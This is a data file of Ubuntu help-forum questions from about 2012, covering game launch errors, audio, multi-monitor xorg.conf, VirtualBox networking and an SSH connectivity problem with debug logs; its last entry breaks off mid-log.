147965	camera involentarily listing to the right in psychonauts	i 've recently purchased the humble bundle v and have been having an absolute riot with the games given . the one problem i 'm running into though , is that whenever i launch psychonauts and run a game , the camera lists to the right slowly and i ca n't get it to stop . strangely enough when i zoom in ( with z ) , it lists to the left . i was wondering if anyone else had this problem and if there was a solution . maybe it 's even the mouse configs i currently have on the laptop that interacts strangely with 3d environments .
147975	middle-click does nothing but makes window controls appear	just did a fresh install of ubuntu 12.04 on my laptop and noticed that the middle-click ( actually three finger-tap on the touchpad ) on firefox does n't work as it used to . when doing it on a link it does n't get opened on a new tab , in fact , it does n't get opened at all . only the ( useless ) window size and position controls appear , as demonstrated on terminal in the following screen shot . how do i get my tab-opening middle-clicks back ?
147977	what is the difference between indicator plugin and notification area ?	i do n't really understand why ubuntu has two `` notification area '' style things that seem to serve the same functionality . i ca n't use only one because some of the programs seem to only work with notification area ( e.g . orage ) and some only work with indicator plugin ( e.g . indicator-sound ) . i noticed that the network manager applet will prefer to insert itself into indicator plugin and if that is n't available , try notification area . i do n't understand why we have/need both ? is it normal to keep both running ?
147978	how can i dump all physical memory to a file ?	i am using ubuntu 11.10 , and wish to simply know whether i can dump all physical memory and swap , as due to some kernel restrictions , i ca n't dd /dev/mem , even as superuser . is there any workaround or option to allow dd'ing /dev/mem or a dedicated tool made to do this correctly ?
147980	line in problem with ubuntu 12.04	i installed ubuntu 12.04 as my main operating system 3 days ago . everything works fine , except my sound card . i can listen to my music without any problem , but when it comes to recording through my line in , the sound keeps skipping and i ca n't set anything through the system configuration menu . i tried the aslamixer command through the gnome console and i still ca n't get it working . i 'll provide information about cards , devices versions , if i am what additional information i should provide so i can be helped .
147981	how do you use both pulse audio and alsa ?	can someone explain the relationship between the different sound components and if they all need to be installed in order to get sound ? for example , i have one called `` playback : ... ( pulseaudio mixer ) '' and another called `` intel ich5 alsa mixer '' which both seem to affect my sound . can i uninstall one of them and still have working audio ?
147984	installing ubuntu 12.04 on asus eee pc freezes on `` grub-install dummy ''	trying to install a completely new copy of ubuntu 12.04 on an asus eee pc . the install almost completes but then it freezes on `` grub-install dummy '' .
147985	windows virtualbox ca n't browse network	i 'm running windows xp as a virtualbox guest os under ubuntu 11.10 , and i ca n't browse the windows network . it seems like i can connect to some specific network shares , maybe only ones that are already mapped to drives . if i disable ufw , it all works fine , and when i enable it again , the network browsing continues to work . i tried looking at /var/log/ufw.log and saw it blocking port 138 . when i allowed that port , then i saw it blocking port 137 . i found this answer , and it led me to bug 360975 . the bug originally asked for both nf_conntrack_pptp and nf_conntrack_netbios_ns to be added to the defaults , but in comment 11 , jamie decided not to include nf_conntrack_pptp in the fix . i tried adding it in , and it seemed to solve my problem , but then the problem came back . how can i let the windows guest os browse the local network ?
147991	upgrade 11.10 to 12.04 on eee pc failed . glibc_2.14 not found	i was upgrading my eee pc from 11.10 to 12.04 as prompted and the upgrade locked up ( the lappy was plugged into power - so that was n't the problem ) . the system wo n't boot now and i 'm getting an error that `` glibc_2.14 not found '' . i am unable to boot into any recovery mode or prior version . the lappy was a dual boot , but when i installed ubuntu the first time , i opted out of that option ( whoops ) . now i ca n't load , it goes into a forever 'ubuntu ' loading screen . i have a fresh install on a memory stick , but when i set the lappy to boot from it - it does n't work . help . i have no idea what to do next ... ? ?
147992	how can i avoid 'installation failed ' error when creating a start up disk ?	i want to create a ubuntu 12.04 live cd . so i open startup disk creator in the ubuntu dash . i go through all of the settings , and then click 'make startup disk ' . almost immediately i get a window that only says 'installation failed ' . i tried it again , and got the same result . i even downloaded a new copy of the .iso file from the ubuntu website . sadly , the same thing happened . how may i avoid this issue ? thanks in advance !
147993	system needs tuning	my ubuntu desktop seems to be running very slow , i wonder if the swap is mounted correctly ? root @ xxxx : /home # fdisk -l disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0001b1be device boot start end blocks id system /dev/sda1 * 4096 204802048 102398976+ 83 linux /dev/sda2 204802049 1943279616 869238784 83 linux /dev/sda3 1943279617 1953517568 5118976 82 linux swap / solaris do i need to run any command to make sure the swap partition is ok ? the top command shows : top - 01:35:42 up 5:40 , 1 user , load average : 0.09 , 0.17 , 0.25 tasks : 139 total , 1 running , 134 sleeping , 1 stopped , 3 zombie cpu ( s ) : 4.3 % us , 0.7 % sy , 0.0 % ni , 94.7 % id , 0.2 % wa , 0.0 % hi , 0.1 % si , 0.0 % st mem : 2035816k total , 1803908k used , 231908k free , 108984k buffers swap : 5118972k total , 0k used , 5118972k free , 1236104k cached while free command shows : /home # free total used free shared buffers cached mem : 2035816 1820056 215760 0 109232 1248636 -/+ buffers/cache : 462188 1573628 swap : 5118972 0 5118972 the swapon -s command gives : filename type size used priority /dev/sda3 partition 5118972 0 -1 thank you in advance !
147995	where do i suggest something related to the default gtk theme ( s ) ?	i just wanted to know where to suggest a change related to the default themes .
148007	multiple monitors only work with unity 2d	the only way for me to get three monitors to work is to degrade down to unity 2d with xinerama . when only one screen is up i.e . two monitors are working with twinview , i am able to use unity 3d . i 'd love to get this resolved . below is my current xorg.conf configuration with xinerama enabled . all three monitors work , however ; unity 2d is currently running . my current configuration has all the monitors slit up . this only works when xinerama is enabled . what can i do in order to get all three monitors working with unity 3d ? ( i 'd prefer to have split x screens ) . i appreciate the communities support . : ) just to elaborate on works - when the monitor does n't work , there is a solid white background , however ; my mouse and keyboard both are read in the monitor . i tried a few key strokes i.e . shift-alt-t and noticed that i was capable of bringing up the terminal in the monitor ( s ) that have a white background . unity 3d was working at this point as well . the only real thing missing was the desktop interface . if it would be beneficial , i will post my xorg.conf configuration for the white background scenario as well . # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 295.33 ( buildd @ allspice ) fri mar 30 13:37:33 utc 2012 section `` serverlayout '' # removed option `` xinerama '' `` 0 '' identifier `` layout0 '' screen 0 `` screen0 '' rightof `` screen2 '' screen 1 `` screen1 '' 0 0 screen 2 `` screen2 '' rightof `` screen1 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` dell p190s '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 76.0 option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor1 '' vendorname `` unknown '' modelname `` dell p190s '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 76.0 option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor2 '' vendorname `` unknown '' modelname `` dell p190s '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 76.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 8400 gs '' busid `` pci:3:0:0 '' screen 0 endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 8400 gs '' busid `` pci:3:0:0 '' screen 1 endsection section `` device '' identifier `` device2 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 8400 gs '' busid `` pci:4:0:0 '' endsection section `` screen '' # removed option `` metamodes '' `` dfp : 1280x1024_75 +0+0 ; dfp : nvidia-auto-select +0+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` dfp : 1280x1024 +0+0 ; dfp : 1280x1024_75 +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' # removed option `` metamodes '' `` crt : nvidia-auto-select +0+0 '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` crt-1 '' option `` metamodes '' `` crt : 1280x1024 +0+0 ; crt : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' # removed option `` metamodes '' `` nvidia-auto-select +0+0 '' identifier `` screen2 '' device `` device2 '' monitor `` monitor2 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` crt-1 '' option `` metamodes '' `` 1280x1024 +0+0 ; nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` extensions '' option `` composite '' `` disable '' endsection
148011	my notebook does not detect cable vga	i want to connect my notebook to my lcd television to be able to see videoes in much bigger size and in major definition but when i connect the cable vga to my notebook it does not detect my lcd , i go to the option to form the screens , give him in detecting monitors and nothing happens absolutely . what can i do to connect my notebook to my lcd ?
148013	i just installed 12.04 , and all of the text on the screen is displaying the incorrect characters . would anyone know how to fix that ?	i wish i could post an image , but i 'll try to describe my issue . all of the text ( except within applications ) looks to be scrambled or switching characters .
148016	openvpn is installed but it is not an avaliable option in the network manager	i have installed and used openvpn once before in a previous install of ubuntu 12.04 . i have since reformatted , and now after reinstalling openvpn it will not show up in the network manager . i am trying to setup my vpn connection and the only option i have to choose from is pptp . edit : i have gnome shell and kde installed as well , gnome being my primary . i can not find openvpn in either gnome or unity , however i can add it without an issue in kde . not really an acceptable workaround , but it works for now . i would still like to be able to do it in gtk based desktops as well .
148018	ca n't start psychonauts game -- segfault	this looks similar to psychonauts humble indie bundle v error but i do n't have the error message ( missing gl capability ) and its solution does not work for me . when trying to run psychonauts from the humble indie bundle on my x86_64 laptop running ubuntu 12.04 i get the following output : < bjn @ segnus : /usr/local/games/psychonauts > $ ./psychonauts stubbed : fix up the rest of the sse code first at detectssesupport ( /home/icculus/projects/psychonauts/source/commonlibs/dfmath/mathgeneral.cpp:32 ) stubbed : write me ? at setpclanguage ( /home/icculus/projects/psychonauts/source/game/luatest/unixmain.cpp:120 ) stubbed : fix up the rest of the sse code first at detectcpucaps ( /home/icculus/projects/psychonauts/source/game/luatest/game/pcgameapp.cpp:223 ) stubbed : check lang envr var at _getdefaultgamelanguage ( /home/icculus/projects/psychonauts/source/game/luatest/game/gameapp.cpp:171 ) console created save path : /home/bjn/.local/share/psychonauts write path : workresource stubbed : inline asm at ssemul_4x4_4x4_2arg ( /home/icculus/projects/psychonauts/source/commonlibs/dfmath/matrix.cpp:710 ) stubbed : inline asm at ssemul_4x4_4x4_3arg ( /home/icculus/projects/psychonauts/source/commonlibs/dfmath/matrix.cpp:698 ) ******** unit test failed ******** stubbed : vk_* at initinputnames ( /home/icculus/projects/psychonauts/source/commonlibs/directx/sdlinput.cpp:1220 ) no joysticks detected transport started daved : nclistensocket : listening on port 40001 sdl_setvideomode ( ) failed : failed loading libgl.so.1 start up completed in 0.06 seconds [ 1 ] 9718 segmentation fault ( core dumped ) ./psychonauts < bjn @ segnus : /usr/local/games/psychonauts > $ output of lspci : 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:19.0 ethernet controller : intel corporation 82567lm gigabit network connection ( rev 03 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) 00:1c.3 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 4 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m-e lpc interface controller ( rev 03 ) 00:1f.2 raid bus controller : intel corporation 82801 mobile sata controller [ raid mode ] ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 02:01.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller ( rev 05 ) 02:01.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 22 ) 0c:00.0 network controller : intel corporation wifi link 5100 any ideas ?
148026	google earth freezes during zoom-in on intel processors with integrated graphics	when i zoom in at a certain zoom level , google earth makes my system freeze completely so that i have to power off or reboot i use kubuntu 12.04 and my laptop has an intel ( r ) core ( tm ) i3-2310m cpu @ 2.10ghz with hd3000 graphics . i installed intel-gpu-tools and tried to fix it with sudo intel_reg_write 0x2120 0x1206800 as explained here , but that did n't work . i wonder if there any other solution out there ...
148030	install ubuntu 12.04lts 64bit in lenovo s205 failed	i have installed ubuntu 12.04lts on lenovo s205 twice , but it would not boot normally . how can i fix this problem ? i tried to install dual boot , windows and ubuntu . but still it would not work properly . even , when i installed ubuntu only , it would not boot too . installation was okay , but it could not boot to ubuntu . just stuck on a blank screen . more information is posted in my blog below http : //fzakiul.wordpress.com/2012/05/11/lenovo-ideapad-s205-vs-ubuntu/ extremely need a help .
148034	how can i add/show current application icon or ubuntu icon on left of unity panel ?	i was wondering if we can put ubuntu or current ( focused ) application icon in unity panel on left like mac . please let me know if i am missing anything . thank you .
148035	clear complete instructions to dual-boot 12.04 on osx lion	honestly , google-surfing this question leads to so many half-answers and multi-part communications that it is both scary and frustrating to try to navigate them . the question here is simple : what are the clear and complete step-by-step instructions that you used to dual-boot 12.04 on your osx lion ( entrapped ) apple computer . did you use refit , refiind , a special .iso of 12.04 ? what ? obviously , there is a preference for safer , easier , and more reversible methods . i can probably assure that the best answer will get plenty of views .
148040	`` try ubuntu without installing '' results in graphical artifacts on macbook	i am trying to bless my macbookpro 5,3 ( unibody/core2duo/nvidia 9400m+nvidia 9600m gt ) with ubuntu 12.04 ( already got refit running ) , but every time i select try ubuntu without installing , it will lock up and always give me the same coloured graphical artifacts all over the screen . whether i use a cd-rom or a usb stick , it does not change a thing . is there anything else that can be done or am i stuck for now ?
148042	can not login to normal mode	i installed ubuntu 12 in my old pc acer power series . after installation i got the login screen which appears unusally big . when i logged-in in some fail-safe mode . i got the normal ubuntu running . but if i restart the system i can login using fail-safe mode but i ca n't login normally . i think the problem must be i do n't have a graphic card . even if i do have one that must be very very low configuration one . kindly help me with graphic card config if that is the problem with my pc . i just want to use ubuntu for normal documentation purpose . i am new to ubuntu so techcies help me with basic guidance . thank you . karthik muralitharan
148044	how do i take a screenshot of the alt-tab menu ?	in ubuntu 12.04 , when i press alt+tab , the following menu comes up : ( todo : take screenshot of alt-tab menu ) but while i have the alt-tab menu up , when i press print screen , and therefore alt+print screen , it takes a screenshot of the active window .
148049	how can i make ubuntu software center offer 32-bit packages	i am developing a 3d game/graphics/simulation engine on 64-bit ubuntu 12.04 lts . the 64-bit version of my application compiles , links and executes just fine . however , i can not build a 32-bit version of my application . i get the following build errors : ld : can not find -lx11 ld : can not find -lcairo ld : can not find -lpango ld : can not find -lfreetype ld : can not find -lfmodex my assumption is , i do not have 32-bit versions of some libraries installed . however , when i look for files with -i386 or : i386 suffix in `` ubuntu software center '' , i do n't see any . for example , if i enter `` libcairo '' in the search field , it shows : libcairo2 libcairo2-dev libcairo2-doc libcairo2-dbg plus a other irrelevant files ( bindings for other languages ) . no matter how i search , i can not see any package names that imply 32-bit libraries . how , exactly , are we supposed to develop 32-bit executables on 64-bit linux circa 2012 and beyond ( ubuntu 12.04 lts in my case ) ?
148051	how to open webpage from wireframesketcher link ?	i have a wireframesketcher screen , in which i want to be able to click the link and open the web page . i have n't been able to do that . i 'm also not sore if that is possible . if anyone knows a way to do it , please tell me .
148055	everytime i am trying to connect to my box using ssh , its failing not connecting	from any other pc doing ssh to my ubuntu 11.10 , is failing . my network setup : telenet isp ( belgium ) > fiber cable < > rj45 cable straight > to ubuntu pc even the ssh is running : other pc : retrying over and over $ ping 192.168.0.128 ping 192.168.0.128 ( 192.168.0.128 ) 56 ( 84 ) bytes of data . from 192.168.0.226 icmp_seq=1 destination host unreachable from 192.168.0.226 icmp_seq=2 destination host unreachable from 192.168.0.226 icmp_seq=3 destination host unreachable from 192.168.0.226 icmp_seq=4 destination host unreachable $ sudo service iptables stop stopping iptables ( via systemctl ) : [ ok ] $ ssh sun @ 192.168.0.128 ssh : connect to host 192.168.0.128 port 22 : no route to host $ ssh sun @ 192.168.0.128 ssh : connect to host 192.168.0.128 port 22 : no route to host $ ssh sun @ 192.168.0.128 ssh : connect to host 192.168.0.128 port 22 : no route to host $ ssh sun @ 192.168.0.128 ssh : connect to host 192.168.0.128 port 22 : no route to host $ ssh sun @ 192.168.0.128 connection closed by 192.168.0.128 $ ssh sun @ 192.168.0.128 sun @ 192.168.0.128 's password : connection closed by unknown $ ssh sun @ 192.168.0.128 ssh : connect to host 192.168.0.128 port 22 : no route to host $ ssh sun @ 192.168.0.128 ssh : connect to host 192.168.0.128 port 22 : no route to host follow up : -- checked cable -- using cable tester and other detectors -- no problem found in cable -- used random 10 cables -- adapter is not broken -- checked it using circuit tester by opening the system ( card is new so its not network adapter card problem ) -- leds are ok showing -- used livecd and did same ping test was having same problem -- disabled ipv6 100 % to make sure its not the cause -- disabled iptables 100 % so its also not the issue -- some more info $ nmap 192.168.0.128 starting nmap 5.50 ( http : //nmap.org ) at 2012-06-08 19:11 cest nmap scan report for 192.168.0.128 host is up ( 0.00045s latency ) . all 1000 scanned ports on 192.168.0.128 are closed ( 842 ) or filtered ( 158 ) nmap done : 1 ip address ( 1 host up ) scanned in 6.86 seconds ubuntu @ ubuntu : ~ $ netstat -aunt | head active internet connections ( servers and established ) proto recv-q send-q local address foreign address state tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen tcp 0 1 192.168.0.128:58616 74.125.132.99:80 fin_wait1 tcp 0 0 192.168.0.128:56749 199.7.57.72:80 established tcp 0 1 192.168.0.128:58614 74.125.132.99:80 fin_wait1 tcp 0 0 192.168.0.128:49916 173.194.65.113:443 established tcp 0 1 192.168.0.128:45699 64.34.119.101:80 syn_sent tcp 0 0 192.168.0.128:48404 64.34.119.12:80 established tcp 0 0 192.168.0.128:54161 67.201.31.70:80 time_wait $ sudo killall dnsmasq -- did not solved the problem -- -- like many other q/a was suggesting this same -- - $ iptables -- list chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination $ netstat -nr kernel ip routing table destination gateway genmask flags mss window irtt iface 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 0 0 0 eth0 192.168.0.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 $ ssh -vvv sun @ 192.168.0.128 openssh_5.6p1 , openssl 1.0.0j-fips 10 may 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to 192.168.0.128 [ 192.168.0.128 ] port 22. debug1 : connection established . debug3 : not a rsa1 key file /home/sun/.ssh/id_rsa . debug2 : key_type_from_name : unknown key type ' -- -- -begin' debug3 : key_read : missing keytype debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug2 : key_type_from_name : unknown key type ' -- -- -end' debug3 : key_read : missing keytype debug1 : identity file /home/sun/.ssh/id_rsa type 1 debug1 : identity file /home/sun/.ssh/id_rsa-cert type -1 debug1 : identity file /home/sun/.ssh/id_dsa type -1 debug1 : identity file /home/sun/.ssh/id_dsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.8p1 debian-7ubuntu1 debug1 : match : openssh_5.8p1 debian-7ubuntu1 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.6 debug2 : fd 3 setting o_nonblock debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug2 : kex_parse_kexinit : diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ssh-rsa-cert-v01 @ openssh.com , ssh-dss-cert-v01 @ openssh.com , ssh-rsa-cert-v00 @ openssh.com , ssh-dss-cert-v00 @ openssh.com , ssh-rsa , ssh-dss debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : kex_parse_kexinit : ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2-nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ssh-rsa , ssh-dss , ecdsa-sha2-nistp256 debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : mac_setup : found hmac-md5 debug1 : kex : server- > client aes128-ctr hmac-md5 none debug2 : mac_setup : found hmac-md5 debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : ssh2_msg_kex_dh_gex_request ( 1024 < 1024 < 8192 ) sent debug1 : expecting ssh2_msg_kex_dh_gex_group debug2 : dh_gen_key : priv key bits set : 118/256 debug2 : bits set : 539/1024 debug1 : ssh2_msg_kex_dh_gex_init sent debug1 : expecting ssh2_msg_kex_dh_gex_reply debug3 : check_host_in_hostfile : host 192.168.0.128 filename /home/sun/.ssh/known_hosts debug3 : check_host_in_hostfile : host 192.168.0.128 filename /home/sun/.ssh/known_hosts debug3 : check_host_in_hostfile : match line 139 debug1 : host '192.168.0.128 ' is known and matches the rsa host key . debug1 : found key in /home/sun/.ssh/known_hosts:139 debug2 : bits set : 544/1024 debug1 : ssh_rsa_verify : signature correct debug2 : kex_derive_keys debug2 : set_newkeys : mode 1 debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug2 : set_newkeys : mode 0 debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug2 : service_accept : ssh-userauth debug1 : ssh2_msg_service_accept received debug2 : key : /home/sun/.ssh/id_rsa ( 0x213db960 ) debug2 : key : /home/sun/.ssh/id_dsa ( ( nil ) ) debug1 : authentications that can continue : publickey , password debug3 : start over , passed a different list publickey , password debug3 : preferred gssapi-keyex , gssapi-with-mic , publickey , keyboard-interactive , password debug3 : authmethod_lookup publickey debug3 : remaining preferred : keyboard-interactive , password debug3 : authmethod_is_enabled publickey debug1 : next authentication method : publickey debug1 : offering rsa public key : /home/sun/.ssh/id_rsa debug3 : send_pubkey_test debug2 : we sent a publickey packet , wait for reply debug1 : authentications that can continue : publickey , password debug1 : trying private key : /home/sun/.ssh/id_dsa debug3 : no such identity : /home/sun/.ssh/id_dsa debug2 : we did not send a packet , disable method debug3 : authmethod_lookup password debug3 : remaining preferred : , password debug3 : authmethod_is_enabled password debug1 : next authentication method : password sun @ 192.168.0.128 's password : debug3 : packet_send2 : adding 64 ( len 60 padlen 4 extra_pad 64 ) debug2 : we sent a password packet , wait for reply debug1 : authentication succeeded ( password ) . authenticated to 192.168.0.128 ( [ 192.168.0.128 ] :22 ) . debug1 : channel 0 : new [ client-session ] debug3 : ssh_session2_open : channel_new : 0 debug2 : channel 0 : send open debug1 : requesting no-more-sessions @ openssh.com debug1 : entering interactive session . debug2 : callback start debug2 : client_session2_setup : id 0 debug2 : channel 0 : request pty-req confirm 1 debug1 : sending environment . debug3 : ignored env orbit_socketdir debug3 : ignored env xdg_session_id debug3 : ignored env hostname debug3 : ignored env gio_launched_desktop_file_pid debug3 : ignored env imsettings_integrate_desktop debug3 : ignored env gpg_agent_info debug3 : ignored env term debug3 : ignored env hardware_platform debug3 : ignored env shell debug3 : ignored env desktop_startup_id debug3 : ignored env histsize debug3 : ignored env xdg_session_cookie debug3 : ignored env gjs_debug_output debug3 : ignored env windowid debug3 : ignored env gnome_keyring_control debug3 : ignored env qtdir debug3 : ignored env qtinc debug3 : ignored env gjs_debug_topics debug3 : ignored env imsettings_module debug3 : ignored env user debug3 : ignored env ls_colors debug3 : ignored env ssh_auth_sock debug3 : ignored env username debug3 : ignored env session_manager debug3 : ignored env gio_launched_desktop_file debug3 : ignored env path debug3 : ignored env mail debug3 : ignored env desktop_session debug3 : ignored env qt_im_module debug3 : ignored env pwd debug1 : sending env xmodifiers = @ im=none debug2 : channel 0 : request env confirm 0 debug1 : sending env lang = en_us.utf8 debug2 : channel 0 : request env confirm 0 debug3 : ignored env kde_is_prelinked debug3 : ignored env gdm_lang debug3 : ignored env kdedirs debug3 : ignored env gdmsession debug3 : ignored env ssh_askpass debug3 : ignored env histcontrol debug3 : ignored env home debug3 : ignored env shlvl debug3 : ignored env gdl_path debug3 : ignored env gnome_desktop_session_id debug3 : ignored env logname debug3 : ignored env qtlib debug3 : ignored env cvs_rsh debug3 : ignored env dbus_session_bus_address debug3 : ignored env lessopen debug3 : ignored env windowpath debug3 : ignored env xdg_runtime_dir debug3 : ignored env display debug3 : ignored env g_broken_filenames debug3 : ignored env colorterm debug3 : ignored env xauthority debug3 : ignored env _ debug2 : channel 0 : request shell confirm 1 debug2 : fd 3 setting tcp_nodelay debug2 : callback done debug2 : channel 0 : open confirm rwindow 0 rmax 32768 debug2 : channel_input_status_confirm : type 99 id 0 debug2 : pty allocation request accepted on channel 0 debug2 : channel 0 : rcvd adjust 2097152 debug2 : channel_input_status_confirm : type 99 id 0 debug2 : shell request accepted on channel 0 welcome to ubuntu 11.10 ( gnu/linux 3.0.0-12-generic x86_64 ) * documentation : https : //help.ubuntu.com/ 297 packages can be updated . 92 updates are security updates . new release '12.04 lts ' available . run 'do-release-upgrade ' to upgrade to it . last login : fri jun 8 07:45:15 2012 from 192.168.0.226 sun @ systemax51 : ~ $ ping 19 < -- -- -- -- lost connection again -- -- -- -- -- -- -- tail 